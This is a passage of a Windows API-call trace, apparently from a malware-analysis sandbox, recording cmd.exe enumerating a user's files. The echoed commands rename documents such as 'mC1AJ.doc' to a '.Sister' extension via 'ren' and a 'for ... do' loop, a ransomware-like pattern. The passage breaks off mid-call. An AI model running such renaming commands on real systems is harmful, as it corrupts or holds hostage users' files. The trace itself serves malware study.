RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5b3c0 [0304.758] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.758] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.759] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.759] GetLastError () returned 0x2 [0304.759] GetProcessHeap () returned 0x21ed8c70000 [0304.759] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92c0040 [0304.759] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92c0050 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.759] SetErrorMode (uMode=0x0) returned 0x0 [0304.760] SetErrorMode (uMode=0x1) returned 0x0 [0304.760] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda1dfe40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0304.760] SetErrorMode (uMode=0x0) returned 0x1 [0304.760] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0304.760] GetProcessHeap () returned 0x21ed8c70000 [0304.760] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5a520 [0304.760] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.760] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.760] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.760] GetLastError () returned 0x2 [0304.760] ??_V@YAXPEAX@Z () returned 0x1 [0304.760] malloc (_Size=0xffce) returned 0x21eda1dfe40 [0304.760] ??_V@YAXPEAX@Z () returned 0x21eda1dfe40 [0304.761] malloc (_Size=0xffce) returned 0x21eda1efe20 [0304.761] ??_V@YAXPEAX@Z () returned 0x21eda1efe20 [0304.761] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.761] GetLastError () returned 0x2 [0304.761] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.761] GetFileType (hFile=0x54) returned 0x2 [0304.761] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0304.761] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0304.766] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.766] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0304.766] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.766] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.766] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0304.773] longjmp () [0304.773] ??_V@YAXPEAX@Z () returned 0x1 [0304.773] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc83b6e0, ftCreationTime.dwHighDateTime=0x1d5ec38, ftLastAccessTime.dwLowDateTime=0x347005e0, ftLastAccessTime.dwHighDateTime=0x1d5e5d1, ftLastWriteTime.dwLowDateTime=0x347005e0, ftLastWriteTime.dwHighDateTime=0x1d5e5d1, nFileSizeHigh=0x0, nFileSizeLow=0x7ea, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="mC1AJ.doc", cAlternateFileName="")) returned 1 [0304.773] GetProcessHeap () returned 0x21ed8c70000 [0304.773] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x156) returned 0x21ed8c758a0 [0304.773] GetProcessHeap () returned 0x21ed8c70000 [0304.773] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x156 [0304.774] GetProcessHeap () returned 0x21ed8c70000 [0304.774] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a680 [0304.774] GetProcessHeap () returned 0x21ed8c70000 [0304.774] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a680, Size=0x30) returned 0x21ed8d2a680 [0304.774] GetProcessHeap () returned 0x21ed8c70000 [0304.774] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a680) returned 0x30 [0304.774] GetProcessHeap () returned 0x21ed8c70000 [0304.774] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a6c0 [0304.774] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.774] GetProcessHeap () returned 0x21ed8c70000 [0304.774] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45d10 [0304.774] ??_V@YAXPEAX@Z () returned 0x1 [0304.774] GetProcessHeap () returned 0x21ed8c70000 [0304.774] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a6c0, Size=0x110) returned 0x21ed8d2a6c0 [0304.774] GetProcessHeap () returned 0x21ed8c70000 [0304.774] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a6c0) returned 0x110 [0304.774] GetProcessHeap () returned 0x21ed8c70000 [0304.774] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a7e0 [0304.775] GetProcessHeap () returned 0x21ed8c70000 [0304.775] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a7e0, Size=0x290) returned 0x21ed8d2a7e0 [0304.775] GetProcessHeap () returned 0x21ed8c70000 [0304.775] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a7e0) returned 0x290 [0304.775] GetProcessHeap () returned 0x21ed8c70000 [0304.775] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2aa80 [0304.775] GetProcessHeap () returned 0x21ed8c70000 [0304.775] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2aa80, Size=0x30) returned 0x21ed8d2aa80 [0304.775] GetProcessHeap () returned 0x21ed8c70000 [0304.775] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2aa80) returned 0x30 [0304.775] GetProcessHeap () returned 0x21ed8c70000 [0304.775] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2aac0 [0304.775] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.775] GetProcessHeap () returned 0x21ed8c70000 [0304.775] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45d40 [0304.775] ??_V@YAXPEAX@Z () returned 0x1 [0304.775] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.775] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7f60 [0304.776] FindClose (in: hFindFile=0x21ed8cc7f60 | out: hFindFile=0x21ed8cc7f60) returned 1 [0304.776] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7960 [0304.776] FindClose (in: hFindFile=0x21ed8cc7960 | out: hFindFile=0x21ed8cc7960) returned 1 [0304.776] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe03c6ef9, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe03c6ef9, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8cc76c0 [0304.776] FindClose (in: hFindFile=0x21ed8cc76c0 | out: hFindFile=0x21ed8cc76c0) returned 1 [0304.777] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0304.777] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\mC1AJ.doc", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc83b6e0, ftCreationTime.dwHighDateTime=0x1d5ec38, ftLastAccessTime.dwLowDateTime=0x347005e0, ftLastAccessTime.dwHighDateTime=0x1d5e5d1, ftLastWriteTime.dwLowDateTime=0x347005e0, ftLastWriteTime.dwHighDateTime=0x1d5e5d1, nFileSizeHigh=0x0, nFileSizeLow=0x7ea, dwReserved0=0x4, dwReserved1=0x7, cFileName="mC1AJ.doc", cAlternateFileName="")) returned 0x21ed8cc7d80 [0304.777] FindClose (in: hFindFile=0x21ed8cc7d80 | out: hFindFile=0x21ed8cc7d80) returned 1 [0304.777] malloc (_Size=0x1ff9c) returned 0x21eda1ffe00 [0304.779] ??_V@YAXPEAX@Z () returned 0x21eda1ffe00 [0304.780] GetProcessHeap () returned 0x21ed8c70000 [0304.780] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45c50 [0304.780] ??_V@YAXPEAX@Z () returned 0x1 [0304.780] ??_V@YAXPEAX@Z () returned 0x1 [0304.780] GetProcessHeap () returned 0x21ed8c70000 [0304.780] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2aac0, Size=0x110) returned 0x21ed8d2aac0 [0304.780] GetProcessHeap () returned 0x21ed8c70000 [0304.780] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2aac0) returned 0x110 [0304.780] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0304.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.780] GetFileType (hFile=0x50) returned 0x2 [0304.780] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.781] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0304.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.781] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0304.792] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.792] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.792] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0304.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.792] GetFileType (hFile=0x50) returned 0x2 [0304.792] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.792] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0304.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.793] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0304.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.794] GetFileType (hFile=0x50) returned 0x2 [0304.794] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.794] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.794] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2a690*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d2a690*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.795] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"mC1AJ.doc\" \"mC1AJ.doc.Sister\" ") returned 32 [0304.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.795] GetFileType (hFile=0x50) returned 0x2 [0304.795] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.795] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.796] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x20) returned 1 [0304.797] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0304.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.797] GetFileType (hFile=0x50) returned 0x2 [0304.798] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.798] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.798] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.799] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0304.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.799] GetFileType (hFile=0x50) returned 0x2 [0304.799] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.799] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.799] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0304.801] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0304.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.801] GetFileType (hFile=0x50) returned 0x2 [0304.801] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.801] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.802] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0304.802] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0304.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.802] GetFileType (hFile=0x50) returned 0x2 [0304.802] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.802] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.803] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0304.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.811] GetFileType (hFile=0x50) returned 0x2 [0304.811] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.811] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.812] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2aa90*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d2aa90*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.812] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"mC1AJ.doc.Sister\" \"mC1AJ.bat\" ") returned 32 [0304.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.812] GetFileType (hFile=0x50) returned 0x2 [0304.812] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.812] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.813] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x20) returned 1 [0304.813] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0304.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.814] GetFileType (hFile=0x50) returned 0x2 [0304.814] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.814] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0304.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.814] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0304.821] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.821] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.822] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.822] malloc (_Size=0xffce) returned 0x21eda1ffe00 [0304.822] ??_V@YAXPEAX@Z () returned 0x21eda1ffe00 [0304.822] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.822] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.822] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.822] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.822] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.822] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.822] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.822] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.822] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.822] ??_V@YAXPEAX@Z () returned 0x1 [0304.822] GetProcessHeap () returned 0x21ed8c70000 [0304.822] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d44c20 [0304.822] GetProcessHeap () returned 0x21ed8c70000 [0304.822] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44c20, Size=0x50) returned 0x21ed8cc76c0 [0304.822] GetProcessHeap () returned 0x21ed8c70000 [0304.822] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc76c0) returned 0x50 [0304.822] GetProcessHeap () returned 0x21ed8c70000 [0304.822] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7420 [0304.822] GetProcessHeap () returned 0x21ed8c70000 [0304.823] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d44e00 [0304.823] GetProcessHeap () returned 0x21ed8c70000 [0304.823] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44e00, Size=0x50) returned 0x21ed8cc7a80 [0304.823] GetProcessHeap () returned 0x21ed8c70000 [0304.823] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc7a80) returned 0x50 [0304.823] malloc (_Size=0xffce) returned 0x21eda1ffe00 [0304.823] ??_V@YAXPEAX@Z () returned 0x21eda1ffe00 [0304.823] GetProcessHeap () returned 0x21ed8c70000 [0304.823] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7c00 [0304.823] GetProcessHeap () returned 0x21ed8c70000 [0304.823] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5aa00 [0304.823] _wcsicmp (_String1="mC1AJ.doc", _String2=".") returned 63 [0304.823] _wcsicmp (_String1="mC1AJ.doc", _String2="..") returned 63 [0304.823] GetFileAttributesW (lpFileName="mC1AJ.doc" (normalized: "c:\\users\\fd1hvy\\documents\\mc1aj.doc")) returned 0x20 [0304.823] GetProcessHeap () returned 0x21ed8c70000 [0304.823] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92d0030 [0304.824] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92d0040 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.824] SetErrorMode (uMode=0x0) returned 0x0 [0304.825] SetErrorMode (uMode=0x1) returned 0x0 [0304.825] GetFullPathNameW (in: lpFileName="mC1AJ.doc", nBufferLength=0x7fe7, lpBuffer=0x21eda1ffe00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\mC1AJ.doc", lpFilePart=0xa6cf4fd660*="mC1AJ.doc") returned 0x23 [0304.825] SetErrorMode (uMode=0x0) returned 0x1 [0304.825] GetProcessHeap () returned 0x21ed8c70000 [0304.825] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5a2b0 [0304.825] _wcsicmp (_String1="mC1AJ.doc", _String2=".") returned 63 [0304.825] _wcsicmp (_String1="mC1AJ.doc", _String2="..") returned 63 [0304.825] GetFileAttributesW (lpFileName="mC1AJ.doc" (normalized: "c:\\users\\fd1hvy\\documents\\mc1aj.doc")) returned 0x20 [0304.825] ??_V@YAXPEAX@Z () returned 0x1 [0304.825] malloc (_Size=0xffce) returned 0x21eda1ffe00 [0304.825] ??_V@YAXPEAX@Z () returned 0x21eda1ffe00 [0304.825] malloc (_Size=0xffce) returned 0x21eda20fde0 [0304.825] ??_V@YAXPEAX@Z () returned 0x21eda20fde0 [0304.826] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\mC1AJ.doc" (normalized: "c:\\users\\fd1hvy\\documents\\mc1aj.doc")) returned 0x20 [0304.826] malloc (_Size=0xffce) returned 0x21ed993f900 [0304.826] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.826] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\mC1AJ.doc", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5aa10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5aa10) returned 0x21ed8cc71e0 [0304.826] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0304.826] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0304.826] ??_V@YAXPEAX@Z () returned 0x1 [0304.826] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\mC1AJ.doc" (normalized: "c:\\users\\fd1hvy\\documents\\mc1aj.doc"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\mC1AJ.doc.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\mc1aj.doc.sister"), lpProgressRoutine=0x0, lpData=0x0, 